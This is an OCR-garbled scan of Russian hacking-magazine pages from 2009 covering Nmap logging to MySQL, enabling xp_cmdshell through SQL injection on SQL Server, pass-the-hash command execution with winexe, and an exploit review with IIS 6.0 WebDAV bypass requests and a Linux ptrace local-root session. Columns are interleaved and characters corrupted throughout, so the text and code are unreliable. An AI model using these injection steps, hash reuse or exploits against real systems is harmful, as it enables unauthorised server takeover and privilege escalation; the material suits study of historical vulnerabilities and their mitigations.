XSS-генератор</tit1е><br /> <br /> кодировок.<br /> <br /> 11<br /> <br /> ЗАДАЧА: ВЕСТИ УЧЕТ РАБОТЫ<br /> <br /> TARGETS -<br /> <br /> NMAP НА ШИРОКОМАСШТАБНЫХ<br /> <br /> address, hostname<br /> <br /> СЕТЯХ<br /> <br /> SC.'\,NNERS -<br /> <br /> храни~' информацию о конкретной исследуемой машине (IР и ОС)<br /> <br /> содержит информацию о хосте, С<br /> <br /> KOToporo<br /> <br /> стартовал<br /> <br /> ~тna.psq1. На случай, если у тебя нес!солько распределенных скане­<br /> <br /> РЕШЕНИЕ:<br /> <br /> ров с ПОДКЛЮ'"-iениен к базе<br /> <br /> Существуетспециальныйпэтч, назыаемыыйпmарsqL(SЩlгсеfогgе.пеt/рГОjесts/<br /> <br /> RUNLIST -<br /> <br /> nmapsCJl]. Он добавляет подцержку работы с МуSQLдля хранения результатов<br /> <br /> твеН:НО 1 информация о поль~ователе читается из lеtс/раssт",1d.<br /> <br /> сканирования. Это позволяет осуществлять удобный анализданных, ВЫПQЛ­<br /> <br /> PORTSTAT -<br /> <br /> нятьсортировкv. и выборки и3той кучилогов, которые могли бы хргниться как<br /> <br /> каждом порте<br /> <br /> обычные текстовые файлы на выходе. Патч заточен на использование под Uп\х1<br /> <br /> HOSTSST.'\T ­<br /> <br /> Liпuх-окружением, позтомуотнесись внимательно к его настройке<br /> <br /> де общеrо количества просканированных ХОСТОВ/ портов и Т.Д.<br /> <br /> содержит<br /> <br /> Hser 10,<br /> <br /> да'IY<br /> <br /> 11<br /> <br /> время ВЫЗОВд.<br /> <br /> Nmap.<br /> <br /> Соответс­<br /> <br /> таблица с результатами сканирования и информацией О<br /> <br /> (open/c1ose/fi1tered)<br /> <br /> всевозможного рода статистическая информация, вро­<br /> <br /> 1. Установи патч и открой файл -/пmарsql.гсдля редактирования. В зтом файле хранятся все необходимые опции, главные из которых<br /> <br /> -<br /> <br /> настрой­<br /> <br /> пример выборки из базы:<br /> <br /> ки для подключения к базе<br /> <br /> iiIYsq1> se1ect t:arget_ip, server'=localhost, db=nmaplog,<br /> <br /> 1.1ser=nтnap,<br /> <br /> д,<br /> <br /> t, port, protocu1,<br /> <br /> -> state, runid frOГll portstat<br /> <br /> passwd=sca~amanga<br /> <br /> пmар -А<br /> <br /> образом'<br /> <br /> --mysql --runid 100 192.168.10_1124<br /> <br /> ~<br /> <br /> результате, в базе создадутся четыре таблицы:<br /> <br /> 040<br /> <br /> target_ip, d, t ; +<br /> <br /> +<br /> <br /> +<br /> <br /> +<br /> <br /> +--------+-------+<br /> <br /> targecip<br /> <br /> 3. В<br /> <br /> Ьу<br /> <br /> I d<br /> <br /> I<br /> <br /> ротс<br /> <br /> I<br /> <br /> руососо1<br /> <br /> Т<br /> <br /> -> order<br /> <br /> 1. Запусти rJmap следующим<br /> <br /> _<br /> <br /> ,"",е '~ ХАКЕР 06 /126/ 091<br /> <br /> SOURCEFORCE.N[T"<br /> <br /> +---------------+------------+----------+--------+---------­ n~ "';><br /> <br /> ''1<br /> <br /> +--------+-------+<br /> <br /> 192.168.10.0 I<br /> <br /> 2003-12-11;<br /> <br /> [ер<br /> <br /> ореп<br /> <br /> ..<br /> <br /> .... ~;tа ........ ~IO'~,-.Iot.'OWoI'1tt . .. ,''!44.~ Мffi.WnOllo:iV"I~o\I';'""'~I(I'O" ...'''''CoNti1.... oi$'.w,. ..... ~>nd'.''''.fI ~''''hm"I~ ..._ • ..... "'""'i'1~t<>••• ,~ ...<br /> <br /> 2003-12-14<br /> <br /> 10:00:37<br /> <br /> 2:'<br /> <br /> ореп<br /> <br /> tcp<br /> <br /> :~<br /> <br /> --<br /> <br /> -----"':-=!.::,:-.-:::{)2~<--~u.-·------_·--:--7j;~;;,·---~--··,<br /> <br /> 100 I<br /> <br /> _ _ I'.:x.oI<br /> <br /> 1192.168.10.1<br /> <br /> I<br /> <br /> 80<br /> <br /> oI&>\I"'.<br /> <br /> 1192.168.10.1<br /> <br /> I<br /> <br /> 10:00:37<br /> <br /> 100 I<br /> <br /> 12003-12-14 110:'30:37 I<br /> <br /> 23<br /> <br /> сср<br /> <br /> ~<br /> <br /> Официальныйпроект nmapsql<br /> <br /> 07,1 [tШ1] N -<br /> <br /> ЗАДАЧА:<br /> <br /> 80 I tcp<br /> <br /> I<br /> <br /> орел<br /> <br /> 100 I<br /> <br /> ВКЛЮЧИТЬВОЗМОЖ­<br /> <br /> НОСТЬИСПОЛНЕНИЯКОМАНД ОПЕРАЦИОННОЙ СИСТЕМЫ<br /> <br /> ,<br /> <br /> И СКРИПТОВ ACТlyEX<br /> <br /> AUTOMATIO N SQL SERVER 2005<br /> <br /> ~:=~~QdogoЩlon<br /> <br /> ...."'- ............_ ....... ч- •. -.... __ ..<br /> <br /> ~'::.'::."Z=::.~<br /> <br /> а_ . . <br /> <br /> ... <~_·._<br /> <br /> ~~'"'..-..4<br /> <br /> "~:.:I ''''''~~''''''"~­<br /> <br /> РЕШЕНИЕ:<br /> <br /> Инъекция в SOL Sегvегтаитв себе огромную опасность за счет наличия <br /> <br /> ~ ..~. L-.<br /> <br /> ---=''''-=====:>!<br /> <br /> большого количества системных хранимых процедур Доступ i< ним поз­ <br /> <br /> xp_cmdshell по умолчанию<br /> <br /> воляет взаимодействовать с оп ерационн ой системой от имени учетной <br /> <br /> Г'едоступен<br /> <br /> записи<br /> <br /> ~,<br /> <br /> lopen<br /> <br /> 100 I<br /> <br /> 1192.168.10.1 12003-12-14. 110:00:37 I<br /> <br /> iI<br /> <br /> t;o::a f(:n;<br /> <br /> НужГ'ые процедурыактивированы<br /> <br /> SOL -сервера, что в большинстве случаев дает права SYSTEM. <br /> <br /> Наиболее интересными являются процедура<br /> <br /> xp_cmdshell,<br /> <br /> позволяющая <br /> <br /> 3. Включаем<br /> <br /> поддержку<br /> <br /> xp_cmdshell:<br /> <br /> исполнять системные команды, а также sp_oacreate/sp_oamethod для ра­ <br /> <br /> I<br /> <br /> I <br /> <br /> I<br /> <br /> I<br /> <br /> I <br /> <br /> I<br /> <br /> I<br /> <br /> боты cOLE-объектами, включая доступ кфайловой системе. Для работы с<br /> <br /> этими процедурами требуется роль sysadmln<br /> <br /> ложен иями, работающими от имени 5а, так что это гlетакая уж и редкость,<br /> <br /> Проблема в том, что<br /> <br /> Mcrosoft в<br /> <br /> 1­<br /> <br /> I <br /> <br /> sp_configure<br /> <br /> 'хр_сшdshеll' ,1<br /> <br /> 4. Вкnючаем поддержку oLE АLJtоmаtiоп:<br /> <br /> целях повышениябезопасностиотключает<br /> <br /> доступ к этим функциямВ конфигурациисервера по умопчанию,Активи­<br /> <br /> sр_сопfigurе<br /> <br /> 'Ole<br /> <br /> Аutошаtiоп<br /> <br /> PrOCedtlres 1,1<br /> <br /> ровать процедурыможно, испопьзуя инструментарийSOLSLJrface Агеа Сопfigшаtюп, Однако понятие о безопасности у парней из Мiсrоsоft всегда<br /> <br /> 5. Переконфигурируем :<br /> <br /> вызывало умиnение. Обпадая привипегиями sуsаdmiп, можно включить<br /> <br /> доступ к этим процедурам удаленно с испоnьзованием средств<br /> <br /> 1. Активируем<br /> <br /> T-SQL.<br /> <br /> reconfigure<br /> <br /> расширенные опции конфигурирования. Объединяем запросы, разделяя их симовоnом ';', добавляем комментарий<br /> <br /> ехес<br /> <br /> sp_configllre 'show advanced options' ,1<br /> <br /> и внедряем через инъекцию! Теперь можно наспаждаться прак-rИ'1ески<br /> <br /> неограниченным доступом к серверу. Ну а что делать дальше<br /> <br /> 2, Переконфиругируем сервер: f I<br /> <br /> ехес<br /> <br /> q не раз сталкивался с при­ <br /> <br /> -<br /> <br /> зависит<br /> <br /> только от твоей фантазии,<br /> <br /> P.S. В SOL Server 2000 xp_cmdshell также можно активировать, используя<br /> <br /> reconfigure<br /> <br /> процедуру sр_аddехtепdеdргос.<br /> <br /> IN 81 о<br /> <br /> --<br /> <br /> _<br /> <br /> ЗАДАЧА, УДАЛЕННО8ЫПОЛНЯТЬ<br /> <br /> КОМАНДЫ, ЗНАЯ ТОЛ ЬКО ИМЯ<br /> <br /> УЧ ЕТНОЙ ЗАП ИСИ И LM/NTLM<br /> <br /> ХЕШ ПОЛЬЗОВАТЕЛЯ<br /> <br /> passhash,html!. Для ее работы требуется библиотека GNU ТLSдовольно дpeBHe~1 версии<br /> <br /> 1 з.<br /> <br /> ИспользоваТЬWlnехе проще простого<br /> <br /> -<br /> <br /> в перемен­<br /> <br /> ной окружения 5MBHASH должен находиться хеш в формате «LM:NTLM». который подцепится автоматом в процессе аутентификации. Если учена находится вдомене, между именем домена и именем учетки нужно поста­<br /> <br /> РЕШЕНИЕ:<br /> <br /> вить 2 [1) обратных слеша.<br /> <br /> Получив LM/NTLM хеши паролей пользователей,всегда возникает непреодолимоежелание как-нибудь их поюзать:] В принципе,<br /> <br /> $ export<br /> <br /> можно вооружи-rься Samln5ide и некоторым количеством времени<br /> <br /> 490саеЬ4.22fЗfа5а7аеб34<br /> <br /> - и получить на i3bIxoAe пароль поnьзователя \но в случае NT хеша<br /> <br /> $\./\·/inexe -U Admin \\192,168.0,1 "ipconfig" <br /> <br /> может и не получ иться<br /> <br /> 1. Одна ко<br /> <br /> 5MBНASH=" fOd412bd7 64ffе81д.аd3Ь43.5Ь51404ее: 209сб174dа <br /> <br /> " <br /> <br /> есть шанс сделать все гораздо<br /> <br /> быстрее и проще. Дело атом, чтоу прыоколов<br /> <br /> NTLMvl и NTLMv2 <br /> <br /> В Винде для этих же целей мо­<br /> <br /> от М$, которые до сих пор используются повсеместно, имеется <br /> <br /> жешь использовать PSH<br /> <br /> одна особенность -<br /> <br /> и<br /> <br /> для успеШI:IОЙ аутентификации знать пароль <br /> <br /> Toolklt<br /> <br /> msvctl. Однак.о PSH Toolklty<br /> <br /> необрзательно. При аутентификации клиентиспользуетвели'1ИНЫ, <br /> <br /> меня запускаться отказалась<br /> <br /> вычисленные с использованием хеша учетной записи, а также <br /> <br /> -<br /> <br /> сессионного ключа, полученного от сервера !чистый хеш не пере­ <br /> <br /> ная версия бибnиотеки<br /> <br /> дается во избежание его даnьнейшего повторного испольэования <br /> <br /> dll, которую мне достать не<br /> <br /> В случае перехватаl. <br /> <br /> удалось, а<br /> <br /> Для решения задачи можешь воспользоваться пропаТ'1енной верси­ <br /> <br /> зал ась аутентифицироватьсяв<br /> <br /> ей wiпехе - аналогом виндовской psexec для никсов IfoofLls.rlet/jmk/ <br /> <br /> ХАКЕР<br /> <br /> 06/126/09<br /> <br /> Выполнение ipconfig и удаленной машине<br /> <br /> whoami<br /> <br /> на<br /> <br /> ей нужна какая-то особен­<br /> <br /> домене.<br /> <br /> m5vctl<br /> <br /> lsasrv.<br /> <br /> наотреэ отка­<br /> <br /> I<br /> <br /> ~<br /> <br /> 041<br /> <br /> »<br /> <br /> tЬ ~<br /> <br /> В::ЛОМ<br /> <br /> Jj<br /> <br /> ОБ3'ОР<br /> <br /> зксплоuтов<br /> <br /> 1\<br /> <br /> ill<br /> <br /> ~~~<br /> <br /> ~<br /> <br /> ОБ='ОР зксплоuтов<br /> <br /> ~<br /> <br /> оsзор<br /> <br /> 3КСПЛQUТОВ<br /> <br /> ОБ3'ОР<br /> <br /> зксплоuтов<br /> <br /> Jj ~<br /> <br /> АНДРЕЙ .SKVOZ. КОМАРОВ<br /> <br /> ,.<br /> <br /> \<br /> <br /> ~<br /> <br /> ~<br /> <br /> ~<br /> <br /> ОБВОр зксплоuтов<br /> <br /> ~ ~<br /> <br /> ~<br /> <br /> /[]~~[!J~/EKSPLOITOV Летняя пора -<br /> <br /> время отдыха. Как бы ни так, когда речь идет об уязви­<br /> <br /> мостях! Соревнования между«злоумышленником» и «защитником»<br /> <br /> [применительно к нашему времени - междухакером и вендором) про­ должаются. Число брешей неизмеримо растет К сожалению, все осве­ тить никак не получается, поэтому в этот раз я подготовил на обозре­<br /> <br /> ние наиболее важные.<br /> <br /> 01<br /> <br /> ОБХОД ОГРАНИЧЕНИЙ<br /> <br /> недоступна на чтение «извне" или жезащищена паролем, ОбращеН~lе<br /> <br /> В МIСRОSОFТ115 6.0<br /> <br /> к файлу относительно самого хоета: sесгеthоst.гu/sесгеt/sесгеt.ziр. Для<br /> <br /> WEBDAV<br /> <br /> обхода огран"чений посылаем GЕТ-запрос вида:<br /> <br /> IJИI<br /> <br /> GET /<br /> <br /> Изюминка зтого класса атак в том, что возможность «забрать» искомое с<br /> <br /> 'I'rапslаtе:<br /> <br /> сервера существует абсолютно безразлично по отношению к за щищен­<br /> <br /> Соппесtiоп:<br /> <br /> насти ресурса. WebDAV IWeb-Ьаsеd Dlstributed Аuthопng апd Vегsiопiпgl<br /> <br /> Host: secrethost.ru <br /> <br /> устанавливается в СВIOке с в<br /> <br /> 115, традиционным<br /> <br /> %cO%aflsecret/secret. zip HTTP/l.l<br /> <br /> f<br /> <br /> close <br /> <br /> WEB-сервером для плат­<br /> <br /> форм линейки "Windows 5erver". WebDAV расш"ряет НТТРследующими<br /> <br /> Видно, ЧТО В URI мы вставили символ «/» [%cO%af), который будет удален из WebDav-запроса. Вторая строка указываетWЕВ-серверу на то, цто<br /> <br /> командами:<br /> <br /> запрос следует обрабатывать с помощью средств<br /> <br /> PROPFIND X!1L. Также<br /> <br /> получение свойств объекта на сервере в формате МОЖНО получать<br /> <br /> структуру<br /> <br /> релозитория<br /> <br /> МКСОL<br /> <br /> изменение свойств за одну транзакцию<br /> <br /> создать коплекцию объектов<br /> <br /> -<br /> <br /> (каталог в случае до­<br /> <br /> ступа к файлам) сору<br /> <br /> -<br /> <br /> MOVE LOCK -<br /> <br /> URI<br /> <br /> то же, что и предыдущая,<br /> <br /> Conneotion: close <br /> <br /> в другой<br /> <br /> только перемещение<br /> <br /> поставить блокировку на объекте.<br /> <br /> вает эксклюзивные<br /> <br /> GET /sec%cO%afret/seoret. zip HTTP/l.l<br /> <br /> Trarlslate: f<br /> <br /> Host: secrethost.ru <br /> <br /> копирование из одного<br /> <br /> UNLOCK -<br /> <br /> Мы можем<br /> <br /> (дерево<br /> <br /> катапогов)<br /> <br /> PROPPATCH -<br /> <br /> WebDav.<br /> <br /> комбинировать" послать нечто вроде:<br /> <br /> и общие<br /> <br /> (shared)<br /> <br /> WebDAV<br /> <br /> поддержи­<br /> <br /> бпокировки<br /> <br /> C'blTb блокирсвку С ресурса<br /> <br /> в отчетпридетсодержимоезащищенногообъекта. даже если дирек­ тория. в которой он располагался,была защищенапаролем. Можноли сделать что-либо еще? Смотри описание запроса PROPFIND<br /> <br /> - с ним<br /> <br /> можно получ"ть структуру какой-либо папки. Если учесть, что, ИСГIОЛЬ­<br /> <br /> эуя U NICODE, мы можем обходить весомые ограничения безопаснос­ Все эти команды являютсядополнительнымиметодами взаимодействия<br /> <br /> ти,<br /> <br /> с WEB-сервером.Узнать более подробно об зтих и основныхзапросах<br /> <br /> PRQPFIN О [msdnm icrosoft.co Пl/еП-ll sfliЬгагуfаа1429601 ЕХС HG65i.<br /> <br /> -<br /> <br /> почему бы не применить это для л"стинга каталогов на сервере?<br /> <br /> НТТР-протоколатыможешьиз моей давней стать" 1«Отпечаткипальцев<br /> <br /> ~I или BPROPFIND Imsdп.miсrosсflсоm/еп-us/liЬгаrv/<br /> <br /> http" - xakep.ru/magazine/xa/1171038/1.asol. Уязвимость COCТO~~TOM.<br /> <br /> aa142725IEXCHG651.aspxJ достаточно подробно описаны, поэтому обо<br /> <br /> что WEB-сервер некорректно обрабатывает URI с UПlсоdе-содержанием.<br /> <br /> всех дополнительных включениях ты без труда сможешь узнать.<br /> <br /> При мер получения списка файлов внутри директории<br /> <br /> .'Ц·М<br /> <br /> Мicrоsоft 1156.0 WebDAV<br /> <br /> PROPFIND /sec%cO%afret/ H'I'TP/l.l<br /> <br /> Host: secrethost_ru<br /> <br /> Usеr-Аgепt: !1ozilla <br /> <br /> "'mтn в<br /> <br /> Предположим. у нас есть директория относительно корня «c:\inetpub\<br /> <br /> Соппесt ion: ТЕ <br /> <br /> wwwroot\secret\". Соответственно,«inetpub\wwwroot\" -то, что со­<br /> <br /> ТЕ: tr'ailers<br /> <br /> Depth: 1 <br /> <br /> здает 115 по дефолту В ней лежит файл<br /> <br /> ~<br /> <br /> 042<br /> <br /> secret:<br /> <br /> secret.zip, пр" этом директор"я<br /> <br /> ХАКЕР 06<br /> <br /> /1261 09<br /> <br /> » ОЕ:30Р<br /> <br /> ОЕ:30р<br /> <br /> ОЕ:30Р<br /> <br /> 3КСПЛОUТОБ<br /> <br /> 3КСПЛОUТОБ<br /> <br /> ~КСПЛОUТОБ<br /> <br /> Con~ent-Length:<br /> <br /> 288 <br /> <br /> 230<br /> <br /> Content-Type: application/xml<br /> <br /> <?xml version=»l.<br /> <br /> О»<br /> <br /> В::ЛОIY1<br /> <br /> \<br /> <br /> Ьад: <br /> <br /> 231<br /> <br /> 'tlrite_un10ck_irqrestore (&task1ist_10ck,<br /> <br /> f1ags) ; <br /> <br /> encoding= Itutf -8 tr?><br /> <br /> <propfind xmll,1s="DAV: "><prop><br /> <br /> <getcontentlengch xmlns="DAV:" /> <br /> <br /> 232<br /> <br /> task_un10ck(task) ; <br /> <br /> <getlastmodi fied xmlns=" DAV: "/> <br /> <br /> 233<br /> <br /> mutex_un10ck(¤t->cred_exec~nutex); <br /> <br /> <resourcetype<br /> <br /> хшlпs= "DAV:<br /> <br /> 2340иС:<br /> <br /> "/> <br /> <br /> <checked-in xmlnS="DAV: "/><br /> <br /> <checked-оuС хшlпs= "DAV:<br /> <br /> "/> <br /> <br /> 235<br /> <br /> </prop></propfind> <br /> <br /> return retval; <br /> <br /> 236 <br /> <br /> .1,]··I'['HI<br /> <br /> На<br /> <br /> На данны й момент не было вы пущено офи циального исп равления<br /> <br /> процесса для работы с «замком» и двумя процессами [текущим и<br /> <br /> 189 и 2ЗЗ строках ptrace_attach использует мьютекс текущего<br /> <br /> уязвимости. поэтому одним из решений может являться отключение<br /> <br /> тем. который передается Е функцию В качестве аргумента), Из-за<br /> <br /> WebDav, Для этого добавь следующее значение IAdd valuel по ключу<br /> <br /> некорректногоиспользованиясгеd_ехес_гпutехтекущего процесса<br /> <br /> «НКЕУ_LOCAL_MAC Н 1N E\5Y5TEM\Cu ггепtСОПlгоL5еt\5егviсеs\WЗ5VС\<br /> <br /> вместо процесса. который должен Быьb отслежен. воэникаетситуа­<br /> <br /> ция «гонки» вовремя исполнения какого-либо процесса и неконтро­<br /> <br /> Parameters»:<br /> <br /> лируемого обращения к SUIO,<br /> <br /> Value Data<br /> <br /> пате:<br /> <br /> DisabIeWebDAV <br /> <br /> Суре: DvЮRD <br /> <br /> mit",/Orm,com/expLoits/8678<br /> <br /> Value data: 1<br /> <br /> Перезагрузи<br /> <br /> протокола<br /> <br /> 115<br /> <br /> и отключение вступит в силу Для отключения<br /> <br /> Практика использования:<br /> <br /> WebDAV можно также воспользоваться средством 115<br /> <br /> Lосkdоwп, За дополнительной информацией обратись к веб-уз­<br /> <br /> # id uid=1000(matthew) gid=1000{matthew) groups=4(adm), 20(dialout) ,24 (cdrom) ,25(floppy), 29(audio) ,30(dip} ,44 (video) ,46 Iplugdev) ,107 (fuse) ,109 (lpadmin) ,115 (admin) , 1000 (matthew)<br /> <br /> лу корпорации Мicrоsоft Imiсгоsоft,соm/tесhпеl/sеCLJгitv/tооLs/<br /> <br /> *<br /> <br /> LocktooL,mspx), IIS lockdown lool- утилита от Microsoft. позволяющаялегко и быстро переключить веб-сервер [115 4,0 или 5,0) в режим. когда работа юттол ько<br /> <br /> КОМ.J.LИЛИИ СППОЙТ <br /> <br /> те сервисы, которые хочет предоставить администратор сервера. а все<br /> <br /> #<br /> <br /> другие отключены, Такой подход может стать временным устранением<br /> <br /> gcc exploi С,. с<br /> <br /> уязви мости,<br /> <br /> #<br /> <br /> Ыпих<br /> <br /> 02<br /> <br /> -о<br /> <br /> exploit <br /> <br /> ипате -а <br /> <br /> matt,he\'!-desktop 2 _6 _ 29-020629-generic #020629<br /> <br /> ЛОКАЛЬНОЕ ПОВЫШЕНИЕ<br /> <br /> SMP Тие Иаr<br /> <br /> 2.6.29<br /> <br /> # while '/biD/true/';do ./exp10it;done<br /> <br /> 24 12:03:21 UTC 2009 i686 GNU/Linux<br /> <br /> ПРИВИЛЕГИЙ В GNU/LINUX KERNEL [, .. much scro11 removed, go<br /> <br /> Imm<br /> <br /> до<br /> <br /> something<br /> <br /> Пробле,~а вызвана функцией «ptrace_attach О» [kernel/ptrace,c] и<br /> <br /> * <br /> <br /> /dev/sda1<br /> <br /> использованием«current->cred_exec_mutex» вместо «task->cгed<br /> <br /> ro)<br /> <br /> exec_mutex», -<br /> <br /> все это может позволить злонамеренным пользова­<br /> <br /> proc<br /> <br /> оп<br /> <br /> телР.м получать привилегии рута с помощью совместных "ptrace О» И<br /> <br /> /sys<br /> <br /> оп<br /> <br /> «ехес<br /> <br /> varrun<br /> <br /> 1)>> вызовов, Код уязвимой функцVoИ представлен ниже:<br /> <br /> ~~'hile оп<br /> <br /> /<br /> <br /> та 1 ,е<br /> <br /> coffee, get<br /> <br /> а<br /> <br /> job.<br /> <br /> rUnIJing ... ]<br /> <br /> Суре ехСЗ<br /> <br /> (rw,relatime,errors=remount,­<br /> <br /> /proc type proc (r\'l. rюехес ,nosu id, node") /sys type sysfs (rw,noexec,rlQsuid,Dodev) оп<br /> <br /> /var/rUrJ type tmpfs<br /> <br /> (rw.поехес,rюsuid,поdе<br /> <br /> У,тоде=0755)<br /> <br /> 175 int ptrace_attach(struct task_struct *task) <br /> <br /> * <br /> <br /> 176 <br /> <br /> деу,тоде=1777)<br /> <br /> 177<br /> <br /> int retval; <br /> <br /> 178<br /> <br /> \lПsigпеd<br /> <br /> оп<br /> <br /> /var/lock type tmpfs (rw,noexec,fiosuid,no<br /> <br /> идеу оп /деу суре<br /> <br /> * <br /> <br /> long flags; <br /> <br /> 1'79<br /> <br /> 180<br /> <br /> varlock<br /> <br /> tmpfs (rw,mode=0755J<br /> <br /> dеvshш оп<br /> <br /> /dev/shm<br /> <br /> суре<br /> <br /> tmpEs (rw)<br /> <br /> оп<br /> <br /> /dev/pts<br /> <br /> Суре<br /> <br /> de'rpts (rw,gid=5,mode=620)<br /> <br /> devpts audlt-ptrace(task); <br /> <br /> 181 <br /> <br /> УЯЗВИМАЯ ФУНКЦИЯ В РЕПОЗИТАРИЯХ<br /> <br /> 182<br /> <br /> retval =<br /> <br /> 183<br /> <br /> lf (same_thread_group(task, current») <br /> <br /> 184<br /> <br /> -БРЕRJ1; <br /> <br /> goto out; <br /> <br /> 185<br /> <br /> ехес'<br /> <br /> 186<br /> <br /> /* Protecr.:<br /> <br /> 187<br /> <br /> agains~<br /> <br /> 188<br /> <br /> creds ge;: determirled diEEerently under ptrace */ <br /> <br /> our<br /> <br /> s credenr_ial calculations <br /> <br /> in~erference;<br /> <br /> SUID, SGID<br /> <br /> 189<br /> <br /> retval = mut,ex_locJcinterruptibIe ( <br /> <br /> 190<br /> <br /> i f (retval <<br /> <br /> ¤t->cred_exec_mutex);<br /> <br /> О) <br /> <br /> ge>toout; <br /> <br /> 191<br /> <br /> апд :,s~r <br /> <br /> _ _- -­<br /> <br /> f ....<br /> <br /> ...<br /> <br /> е<br /> <br /> .<br /> <br /> х<br /> <br /> гт_---....-.:о---<br /> <br /> ;-:7р:;......<br /> <br /> ~<br /> <br /> '$<br /> <br /> ._~~~~~-' ~:"".!'.::i-.c:= >---7:,.~ ~':;";;;;;:';J~.,.""..~"=:;.":, ~:--:..- .•-. ~<br /> <br /> ::: ~<br /> <br /> J;~ ~':::=~~:--:~=~~::::=::"""~-~I' <br /> <br /> ~=-_."~ ~:=~=~~:"~"<br /> <br /> ::; ~~~3~<br /> <br /> §'Y~' ~~.~<br /> <br /> ['-~ --<br /> <br /> __<br /> <br /> BUGZILLA<br /> <br /> . . ,w.~." <br /> <br /> ~E,~~:::~~-=E:~~'::::':::~_,_"<br /> <br /> :.:;.';";':::.. .,.. _...'_' ..... <0._'.....''''.-_-''<br /> <br /> ...<br /> <br /> '.~~.~.-_._~<br /> <br /> ....-........'" ......... ~.<br /> <br /> .... -,',::.;::~~~:,::-:.-~-..:._ ..<br /> <br /> о:;: ~<br /> <br /> =~'M·""<br /> <br /> 192<br /> <br /> 193<br /> <br /> retval =<br /> <br /> -ЕРБRН; <br /> <br /> 194 repeat: <br /> <br /> ХАКЕР<br /> <br /> 06/1261 09 <br /> <br /> ~<br /> <br /> 043<br /> <br /> »<br /> <br /> В::АОМ<br /> <br /> os~op<br /> <br /> os~op<br /> <br /> os~op<br /> <br /> 3КСПАОUТОВ<br /> <br /> 3КСПЛОUТОЕ'<br /> <br /> 3КСПЛОUТО~<br /> <br /> I ,<br /> <br /> ~<br /> <br /> _,__- ­<br /> <br /> _<br /> <br /> _......<br /> <br /> r"' __ 1<br /> <br /> 1_ _ -<br /> <br /> ",..<br /> <br /> • _ _ ._..:­ a<br /> <br /> • __...... 0<br /> <br /> :<br /> <br /> "<br /> <br /> '<br /> <br /> :<br /> <br /> '<br /> <br /> "<br /> <br /> -<br /> <br /> ~<br /> <br /> .. _ .<br /> <br /> ......<br /> <br /> ...-._...,.,. ,,<br /> <br /> ~<br /> <br /> __<br /> <br /> _<br /> <br /> .\(:.­ a,_""_(\ _ _<br /> <br /> "<br /> <br /> .<br /> <br /> ~~~~eport [О: n:;ТtJоt:ramt::СIUIТtШRun())<br /> <br /> ..­<br /> <br /> --<br /> <br /> .........<br /> <br /> ..,.~_.""<br /> <br /> ~~' ~~ §~=~_. =::--"=~ __ и.<br /> <br /> ,<br /> <br /> ..<br /> <br /> _ ... ,.~<br /> <br /> ~,-\<oyo'­<br /> <br /> ч'''<br /> <br /> __<br /> <br /> ....,<br /> <br /> "<br /> <br /> ~~ ~"AJ:I<br /> <br /> _-­ -­ ...... _<br /> <br /> ~<br /> <br /> ...... __...-_... .... ---_ .. ... ... . ~<br /> <br /> 1.'1 _,....,JII<br /> <br /> -~<br /> <br /> ~~<br /> <br /> ~-....:.u ".""""",,,,"~Y~»I<br /> <br /> ---­<br /> <br /> ~~"".ш<br /> <br /> •<br /> <br /> ..<br /> <br /> ~<br /> <br /> . 1»\<br /> <br /> ЗАПРЕТ РАСШИРЕНИЙ WEBDAV ЧАСТИЧНО СПАСАЕТ ОТ ПРОБЛЕМЫ<br /> <br /> ~Ua.:.,:.J<br /> <br /> '(<br /> <br /> ): :: ::~=--=.<br /> <br /> .....<br /> <br /> --[<br /> <br /> ...<br /> <br /> ,.<br /> <br /> _,,<:o~<br /> <br /> ::"~~ГI<br /> <br /> ii""_'--~~­ --'"'.-'"==."'-"'-"'-'-"-==--,=====------------.--~,;<br /> <br /> ВСЕ ВЫНУЖДЕННЫЕКРЭШИ БРАУЗЕРАЧЕТКО ОТСЛЕЖИВАЮТСЯИ АНАЛИЗИРУЮТСЯРАЗРАБОТЧИКАМИ<br /> <br /> 3504 / / 5е" соmmепts in В1JildТехtRuпFогFrаюеs,, , 3505 / / if i te;.:t .uп-:>GеtF1Qgs() <~ gfxF'ontGroup: : ТЕХТ __ IS_PERSISTENT) (<br /> <br /> *<br /> <br /> securityfs<br /> <br /> оп<br /> <br /> /sys/kerne1/securiry type securityfs (n,)<br /> <br /> g'Tfs-fusе-dаеmоп ол<br /> <br /> /home/matttlew/ ,gvfs type<br /> <br /> ЕаБе,<br /> <br /> (rw,nosuid,nodev,user~"atrhew)<br /> <br /> gvfs-fuse-daemon [<br /> <br /> I'ПN!<br /> <br /> [<br /> <br /> О'Теrwriёtеп ОхЬ8097430<br /> <br /> 18281<br /> <br /> NS_EF.ROR("Shouldn't reachh re<br /> <br /> / / the textrun' s text<br /> <br /> поdе ёЬа t<br /> <br /> has changed,<br /> <br /> :01'110"1 . . . »);<br /> <br /> !1йУ Ье rеfеr'еnсiпg а<br /> <br /> DOI,1<br /> <br /> textl-UТJ по".<br /> <br /> 3508//<br /> <br /> //<br /> <br /> SO<br /> <br /> 3509 / /<br /> <br /> if<br /> <br /> (tехtЕuп->GеtЕхрi::аtiОЛSёаtе i)­<br /> <br /> ",e'd betteI' kill this<br /> <br /> >IsTracKed () J {<br /> <br /> # id \lid=O(roor) gid=,1000(marrhe\>l) иё)<br /> <br /> 3506//<br /> <br /> 3507 / /<br /> <br /> ,24<br /> <br /> (сдтош)<br /> <br /> (Оорру)<br /> <br /> ,25<br /> <br /> grоuрs=4(аdш) ,20(dia10<br /> <br /> ,29(aud10) ,30(dip),<br /> <br /> 44 (v1deo) ,46 (p1ugdev) ,107{fuse) ,109 (lpadmin) ,115(ad min) ,1000 (matthew)<br /> <br /> gТехtЕuпs->RеnюvеFготСасhеiсехtRuп); <br /> <br /> 35:0// 3511 //<br /> <br /> ) <br /> <br /> 3512 / /<br /> <br /> de1 .te cextEUIl; <br /> <br /> J 513 / /<br /> <br /> :-еturПi <br /> <br /> 3514 / /<br /> <br /> Итак. Г1р И В илеги и были уеГ1е шно захвачены.<br /> <br /> 3515 <br /> <br /> ii<br /> <br /> 3516<br /> <br /> liЬii,Ш тРаёЬ<br /> <br /> (! (ёехtRuп->GеtF1аgs() &<br /> <br /> gfxTextEunWordCache: :TEXT_IN_CACHEJ ) <br /> <br /> rPath Linux 2<br /> <br /> 3517<br /> <br /> / / Eemove<br /> <br /> i~ гюи ЬеСдиве<br /> <br /> it' s<br /> <br /> лоt.<br /> <br /> cJoing <br /> <br /> rPath App1iance<br /> <br /> Р1аtfопп<br /> <br /> Linux service 2<br /> <br /> .:щуthiпg<br /> <br /> rParh App1iance<br /> <br /> Рlаtfопп<br /> <br /> Linux Service 1<br /> <br /> 3518<br /> <br /> 